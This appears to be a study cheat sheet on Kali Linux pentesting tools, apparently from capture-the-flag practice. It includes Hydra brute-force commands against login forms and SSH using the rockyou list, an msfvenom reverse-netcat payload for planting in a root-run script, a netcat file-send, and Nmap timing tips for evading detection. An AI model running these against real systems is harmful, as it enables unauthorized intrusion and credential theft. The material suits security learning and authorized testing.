Security Tools

This section covers a wide variety of security tools that can be found on Kali Linux.

Burp Suite

Burp Suite is a framework of web application pentesting tools. See ZAP for a similar (completely free) tool).

Burp Suite needs to be able to act as a proxy. Follow this tutorial by tryhackme to set up FoxyProxy in firefox

Components

Burp suite has a number of different components:

  • Proxy: Funnel traffic through Burp
  • Target: Scope the project. Can be used to create a sitemp of the application we are testing.
  • Intruder: Powerful tool. Can be used for field fuzzing to credential stuffing
  • Repeater: "Repeat" requests. Often used with fuzzing.
  • Sequencer: Analyze the "randomness" present where random is intended
  • Decoder: Transforms data
  • Extender: Add extensions
  • Scanner (Premium Feature): Automated web vulnerability scanner

• Intruder

Positions

From the Positions tab, you may select different fields to attack.

Attack type

  • Cluster Bomb: Brute force. Iterate through every combination of the payloads.

Payloads

Add payloads (dictionaries).

To start the attack, press the attack button in the top right corner. :)

• Proxy

Intercept

The intercept tab intercepts web traffic and allows you to view the request. You can send particular parts of this request to different modules, such as the Intruder module.

Cyberchef

CyberChef

Gobuster

Gobuster is a tool used to brute-force URIs (directories and files), DNS subdomains, virtual host names, and open amazon S3 buckets.

There are three modes:

  • dir
  • vhost
  • dns

• Dir

dir mode arguments:

  • -u: What url to enumerate
  • -w: Wordlist to append to the url
  • -x: Extensions to append to each word in the wordlist

Example:

$ gobuster dir -u http://example.com -w wordlist.txt -x php,txt,html

Hydra

Hydra is a network logon cracker for many different services.

• Http Post Form

General syntax:

$ hydra -l <username> -P <wordlist> <Target IP> http-post-form "<URL Path>:<Post Arg>=^<KEY>^:<TAGS>"

Example:

  • hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/login:username^USER^&password=^PASS^:F=incorrect"

• Ssh

General syntax:

$ hydra -l <username> -P <absolute path to passwords file> <Target IP> -t <thread count> ssh

Msfvenom

Payload generator and encoder. Generates payloads that allow for things such as a reverse netcat connection

• Examples

Reverse Netcat

If there is a script that can we can write to that runs as root on the target machine:

  • Local: msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R
  • Local: nv -lvp 8888
  • Target: echo <msfvenom output> > script

Netcat

Netcat allows you to listen or connect to TCP/UDP ports

General syntax:

$ netcat [options] host port

• Listener

Create a listener on port 4444:

$ netcat -l 4444

• Send

Send traffic (from file specifically):

$ netcat 192.168.1.1 4444 < file.txt

Nmap

• Output

  • -oA: Saves output in all three file types; grepable, XML, and script kiddie
  • -oG: Saves output in a grepable format
  • -oX: Saves output as an XML file
  • -oS: Saves output in a script kiddie format
  • -v: Verbose. Some output is nice to see the progress
  • -vv: Very verbose

• Scans

  • -A: Aggresive scan. Enable OS detection, version detection, script scanning, and traceroute
    • Same as -O -sV -sC --traceroute
  • -O: Operating system detection
  • -p <ports,>: Specify ports to scan
    • -p-: Scan every port
  • -Pn: Treat each host as active. Skip host discovery
  • -sS: TCP SYN scan (stealth scan). Quick scan. Does not complete the TCP connection
  • -sT: TCP connection scan
  • -sU: UDP scan
  • -sV: Service version scan

• Scripts

To use a script: --script <script name>. Here is a list of nmap scripts.

Useful scripts:

  • vulners: Check for known vulnerabilities

• Timing

-T<N>: How aggressively (quickly) to scan. Ranges from 0 to 5.

  • 0: Paranoid. Waits 5 minutes between each probe
  • 1: Sneaky. Waits 15 seconds between probes
  • 2: Polite. Waits 0.4 seconds between probes
  • 3: Normal. Default. Includes parallelization
  • 4: Aggressive
  • 5: Insane

1 and 2 are useful to avoid IDS alerts.

Reverse Shells

• Php

php-reverse-shell.php

Searchsploit

SearchSploit is a command line search tool for Exploit-DB

Needs to be updated periodically (weekly): searchsploit -u

• Automation

You can use the XML file generated by nmap to automate finding exploits.

--nmap <file>.xml

Sqlmap

cheatsheet. PayloadsAllTheThings. General sql injection payload list.

Wfuzz

Wfuzz is a web application bruteforcer. It replaces any occurrence of the FUZZ keyword with a given payload. It can fuzz URIs, similar to gobuster, to more complicated tasks, such as GET and POST parameters.

Arguments:

  • -c: Color
  • -u: URL to use for the request
  • -d: Parameters to fuzz with. For example, to fuzz a php argument: -d "date=FUZZ"
  • -z: Specify what will replace FUZZ.
    • file: Replace with a file. Example: -z file,wordlist.txt
  • --hc: Don't show certain http response codes. For example: --hc 404
  • --hl: Don't show for a certain number of lines in the response
  • --hh: Don't show for a certain number of characters in the response

Example:

$ wfuzz -c -z file,big.txt localhost:80/FUZZ/note.txt
$ wfuzz -c -z file,big.txt -d "username=FUZZ&password=FUZZ" -u http://example.com/login.php
$ wfuzz -c -z file,wordlist.txt -d "date=FUZZ" -u http://10.10.180.198/api/site-log.php --hh 0

Whois

Get DNS information for a website.

Example: 

$ whois daltoncole.com

Word Lists

A large collection of word lists can be found here.

• Rockyou

rockyou.txt is a leaked unencrypted password list from RockYou. On Kali, it can be found under /usr/share/wordlists/rockyou.txt.gz. Use gzip -d rockyou.txt.gz to unzip it.

Zap

OWASP ZAP is an enumeration tool, similar to Burp Suite, however, ZAP is open source and completely free.